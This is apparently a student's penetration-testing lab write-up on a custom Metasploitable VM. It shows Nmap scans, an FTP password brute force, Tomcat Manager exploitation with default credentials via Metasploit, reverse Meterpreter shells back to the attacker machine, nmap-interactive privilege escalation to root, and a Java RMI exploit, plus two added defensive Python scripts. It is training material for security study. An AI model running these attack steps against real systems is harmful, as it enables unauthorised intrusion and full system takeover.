Metasploitable (Custom 2)
This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to perform tasks and gain root privileges within a set time limit.

Recon: N.A.
Reconnaissance was not needed, as I was provided with a list of usernames.
Scanning: Nmap
The target IP address was 192.168.249.148
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/custom2]
└─$ nmap -sV -p- --open 192.168.249.148 -oA c2Open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 08:58 +08
Nmap scan report for 192.168.249.148
Host is up (0.0069s latency).
Not shown: 65505 closed tcp ports (conn-refused), 21 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
2121/tcp open ftp ProFTPD 1.3.1
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
43358/tcp open nlockmgr 1-4 (RPC #100021)
47961/tcp open java-rmi GNU Classpath grmiregistry
54092/tcp open status 1 (RPC #100024)
60676/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: metasploitable.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.33 seconds
I was reminded not to skip UDP scanning, as it can reveal further services and potential vulnerabilities that a TCP scan misses.
-sU: UDP Scan
-sV: Probe open ports to determine service/version info (combined with -sU as -sUV below)
-T<0-5>: Set timing template (higher is faster)
-F: Fast mode - Scan fewer ports than the default scan
--version-intensity : Set from 0 (light) to 9 (try all probes)
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/custom2]
└─$ sudo nmap -sUV -T4 -F --version-intensity 0 192.168.249.148 -oA c2UDP
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:07 +08
Nmap scan report for 192.168.249.148
Host is up (0.00071s latency).
Not shown: 64 open|filtered udp ports (no-response), 33 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
111/udp open rpcbind
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
2049/udp open tcpwrapped
MAC Address: 00:0C:29:D3:9E:35 (VMware)
Service Info: Host: custom2
Masscan can scan faster with the --rate=1000 flag (packets per second), and it can scan TCP and UDP ports together in a single run with a command such as:
masscan -p1-65535,U:1-65535 10.10.10.x --rate=1000

Enumeration: "It Worked" Brute Force (NSE)
With the provided list of usernames, I can attempt a brute force attack against the FTP service on port 2121 using the Nmap Scripting Engine (NSE).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
I installed the 'seclists' package to add more wordlists to my Kali Linux library:
sudo apt install seclists
┌──(kali㉿kali)-[~]
└─$ sudo apt install seclists
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
seclists
0 upgraded, 1 newly installed, 0 to remove and 641 not upgraded.
Need to get 387 MB of archives.
After this operation, 1,559 MB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 seclists all 2022.1-0kali1 [387 MB]
Fetched 387 MB in 32s (12.3 MB/s)
Selecting previously unselected package seclists.
(Reading database ... 289621 files and directories currently installed.)
Preparing to unpack .../seclists_2022.1-0kali1_all.deb ...
Unpacking seclists (2022.1-0kali1) ...
Setting up seclists (2022.1-0kali1) ...
Processing triggers for kali-menu (2021.4.2) ...
Reference: https://www.kali.org/tools/seclists/
I was initially using Medusa, a brute forcing tool. However, it seemed to be taking quite a while with a wordlist of 500 passwords. I then ran Nmap (NSE) using the same 500-password wordlist, as shown in Figure 1 below:

Nmap's ftp-brute NSE script seemed to be faster: it completed the brute force attempt in 332.63 seconds (about 5.54 minutes) while Medusa had yet to finish.
For demonstration purposes, I will use a smaller wordlist: /usr/share/seclists/Passwords/darkweb2017-top10.txt
The default FTP port is 21. Since the service here runs on port 2121, I need the '-sV' flag so that Nmap identifies it as FTP and the ftp-brute script runs against it.
-sV: Probe open ports to determine service/version info
-p : Only scan specified ports
--script: Runs a script scan using the comma-separated list of filename|category|directory/|expression[,...]
--script-args: Lets you provide arguments to NSE scripts
-oN: Outputs file in a normal format
┌──(kali㉿kali)-[~/custom2]
└─$ sudo nmap -sV -p 2121 --script=ftp-brute --script-args userdb=/home/kali/custom2/usernames.txt,passdb=/usr/share/seclists/Passwords/darkweb2017-top10.txt 192.168.249.148 -oN c2ftpbrute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 12:36 +08
Stats: 0:03:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 192.168.249.148
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
| ftp-brute:
| Accounts:
| xxxxxx:xxxxxx - Valid credentials
|_ Statistics: Performed 27320 guesses in 322 seconds, average tps: 81.9
MAC Address: 00:0C:29:D3:9E:35 (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 322.37 seconds
I managed to find the password for the username!
| ftp-brute:
| Accounts:
| xxxxxx:xxxxxx - Valid credentials
Reference: https://www.infosecmatter.com/nmap-nse-library/?nse=ftp-brute
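From the defender's side, the 27320 guesses in 322 seconds that the scan reports leave a very loud trail in the FTP server's log. The script below is an added example, not part of the original write-up or of Nmap: it parses constructed ProFTPD-style log lines (the format is assumed from ProFTPD's default login messages and real lines depend on the configured LogFormat), flags a client IP once its failures cross a threshold inside a sliding window, and lists which accounts then logged in successfully from that IP.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed ProFTPD-style log lines (format assumed): five failures from one
# client, a success with the guessed password, then one unrelated typo.
SAMPLE_LOG = """\
2022-03-31 12:36:01,101 pt003 proftpd[2201] pt003 (kali[192.168.249.140]): USER msfadmin (Login failed): Incorrect password.
2022-03-31 12:36:01,340 pt003 proftpd[2202] pt003 (kali[192.168.249.140]): USER msfadmin (Login failed): Incorrect password.
2022-03-31 12:36:01,612 pt003 proftpd[2203] pt003 (kali[192.168.249.140]): USER tomcat (Login failed): Incorrect password.
2022-03-31 12:36:02,004 pt003 proftpd[2204] pt003 (kali[192.168.249.140]): USER user (Login failed): Incorrect password.
2022-03-31 12:36:02,455 pt003 proftpd[2205] pt003 (kali[192.168.249.140]): USER user (Login failed): Incorrect password.
2022-03-31 12:36:03,120 pt003 proftpd[2206] pt003 (kali[192.168.249.140]): USER user: Login successful.
2022-03-31 12:40:15,000 pt003 proftpd[2310] pt003 (desk7[192.168.249.22]): USER alice (Login failed): Incorrect password.
"""
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) .*?\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]\): USER (?P<user>[^\s:]+)")

def parse(line):
    """Return (timestamp, client_ip, username, failed) for a login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S,%f")
    return ts, m["ip"], m["user"], "(Login failed)" in line

def detect_bruteforce(log, threshold=4, window_s=60):
    """Per client IP, count failures inside a sliding window; alert at threshold."""
    recent, alerts = defaultdict(deque), {}
    for line in log.splitlines():
        rec = parse(line)
        if rec is None or not rec[3]:
            continue
        ts, ip, user, _ = rec
        dq = recent[ip]
        dq.append((ts, user))
        while (ts - dq[0][0]).total_seconds() > window_s:  # drop entries outside the window
            dq.popleft()
        if len(dq) >= threshold:  # keep the alert current as failures continue
            alerts[ip] = {"failures": len(dq), "last": ts, "users_tried": sorted({u for _, u in dq})}
    return alerts

def successes_after_bruteforce(log, alerts):
    """Accounts that then logged in from an alerted IP: the guessed password, seen server-side."""
    hits = defaultdict(list)
    for ts, ip, user, failed in filter(None, map(parse, log.splitlines())):
        if not failed and ip in alerts and ts >= alerts[ip]["last"]:
            hits[ip].append(user)
    return dict(hits)
```

At the 81.9 guesses per second the scan above reports, a threshold like this trips within the first second; the interesting output is the list of accounts that succeeded afterwards, which is what needs a password reset.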
Exploitation: "Succeeded" Tomcat Manager (Msfconsole)
I will attempt to exploit the Tomcat Manager on port 8180 using the credentials obtained earlier.
PORT STATE SERVICE VERSION
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Visit the target URL in a web browser:
192.168.249.148:8180
Click the Tomcat Manager link and enter the default login credentials, as shown in Figure 2 below:
Username: tomcat
Password: tomcat
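Seen from the defender's side, the tomcat:tomcat login above is the sample account that ships in tomcat-users.xml and sits at the top of every default-credential list. The audit script below is an added example, not part of the original write-up or of Tomcat: both configuration fragments are constructed, the hardened password is a placeholder, and the role names cover both the older 'manager'/'admin' roles and the newer 'manager-gui' split.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml fragments (not taken from the lab box). The weak
# one mirrors the sample accounts that ship with Tomcat, with tomcat:tomcat
# additionally granted the Manager roles; the hardened one is the same file
# with one purpose-built deployer account and a placeholder strong password.
WEAK_CONF = """<tomcat-users>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
</tomcat-users>"""
HARDENED_CONF = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="ops-deployer" password="Xk2!vQ9pL#mR7sWz8tYb" roles="manager-gui"/>
</tomcat-users>"""

# Passwords from Tomcat's sample config and documentation; any hit is a finding.
DEFAULT_PASSWORDS = {"tomcat", "s3cret", "admin", "manager", "password"}
# Roles that reach the Manager/Host Manager apps, old naming and new.
PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script",
                    "manager-jmx", "manager-status", "admin-gui", "admin-script"}

def audit_tomcat_users(xml_text, min_len=16):
    """Return one (username, reason, privileged_roles) finding per weakness found."""
    findings = []
    for user in ET.fromstring(xml_text).iter("user"):
        name, pw = user.get("username", ""), user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        priv = sorted(roles & PRIVILEGED_ROLES)
        reasons = []
        if pw.lower() == name.lower():
            reasons.append("password equals username")
        if pw.lower() in DEFAULT_PASSWORDS:
            reasons.append("password in default list")
        if len(pw) < min_len:
            reasons.append(f"password shorter than {min_len}")
        findings.extend((name, reason, priv) for reason in reasons)
    return findings

def manager_exposed(findings):
    """True if any weak account holds a Manager role: the condition that let
    tomcat_mgr_upload deploy its WAR in the session above."""
    return any(priv for _, _, priv in findings)
```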

I will exploit the Tomcat Manager using Msfconsole
msfconsole
┌──(kali㉿kali)-[~/custom2]
└─$ msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: When in a module, use back to go back to the top level prompt
msf6 >
search type:exploit tomcat jsp
msf6 > search type:exploit tomcat jsp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
1 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
2 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE
3 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
4 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/tomcat_jsp_upload_bypass
msf6 >
use exploit/multi/http/tomcat_mgr_upload
set HttpPassword tomcat
set HttpUsername tomcat
set rhosts 192.168.249.148
set rport 8180
set lhost 192.168.249.140
set lport 8999
options
msf6 > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.249.148
rhosts => 192.168.249.148
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8180
rport => 8180
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/http/tomcat_mgr_upload) > set lport 8999
lport => 8999
msf6 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.249.148 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8999 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
msf6 exploit(multi/http/tomcat_mgr_upload) >
run
getuid
sysinfo
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 192.168.249.140:8999
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying myqVwooMhNFWHuY18YtXDsFlRU1LL...
[*] Executing myqVwooMhNFWHuY18YtXDsFlRU1LL...
[*] Undeploying myqVwooMhNFWHuY18YtXDsFlRU1LL ...
[*] Undeployed at /manager/html/undeploy
[*] Sending stage (58053 bytes) to 192.168.249.148
[*] Meterpreter session 1 opened (192.168.249.140:8999 -> 192.168.249.148:45227 ) at 2022-03-31 16:50:43 +0800
meterpreter > getuid
Server username: tomcat55
meterpreter > sysinfo
Computer : custom2
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter >
shell
python -c 'import pty; pty.spawn("/bin/bash")'
nmap --interactive
!sh
whoami
meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
tomcat55@pt003:/$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2#
I obtained a 'root' shell by executing '!sh' in Nmap's interactive mode!
Reference: https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/
Exploitation: "Succeeded" Java RMI (Msfconsole)
I will attempt to exploit the Java RMI registry service on port 47961.
PORT STATE SERVICE VERSION
47961/tcp open java-rmi GNU Classpath grmiregistry
msfconsole
┌──(kali㉿kali)-[~/custom2]
└─$ msfconsole
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View missing module options with show missing
msf6 >
search type:exploit java rmi
msf6 > search type:exploit java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
4 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
5 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
8 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec
msf6 >
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.148
set rport 47961
set lhost 192.168.249.140
set lport 8889
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.148
rhosts => 192.168.249.148
msf6 exploit(multi/misc/java_rmi_server) > set rport 47961
rport => 47961
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 8889
lport => 8889
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.148 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 47961 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8889 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf6 exploit(multi/misc/java_rmi_server) >
run
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:8889
[*] 192.168.249.148:47961 - Using URL: http://0.0.0.0:8080/ggqTzR
[*] 192.168.249.148:47961 - Local IP: http://192.168.249.140:8080/ggqTzR
[*] 192.168.249.148:47961 - Server started.
[*] 192.168.249.148:47961 - Sending RMI Header...
[*] 192.168.249.148:47961 - Sending RMI Call...
[*] 192.168.249.148:47961 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.148
[*] Meterpreter session 1 opened (192.168.249.140:8889 -> 192.168.249.148:60997 ) at 2022-03-31 15:42:26 +0800
[-] 192.168.249.148:47961 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.148:47961 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >
I am getting the following errors:
[-] 192.168.249.148:47961 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.148:47961 - Server stopped.
[*] Exploit completed, but no session was created.
However, the output did mention 'Meterpreter session 1 opened'. Hence, I executed 'sessions' to check whether there was indeed one:
sessions
msf6 exploit(multi/misc/java_rmi_server) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ custom2 192.168.249.140:8889 -> 192.168.249.148:60997 (192.168.249.148)
msf6 exploit(multi/misc/java_rmi_server) >
sessions 1
getuid
sysinfo
msf6 exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : custom2
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >
Executing 'getuid' showed that the server username is 'root'!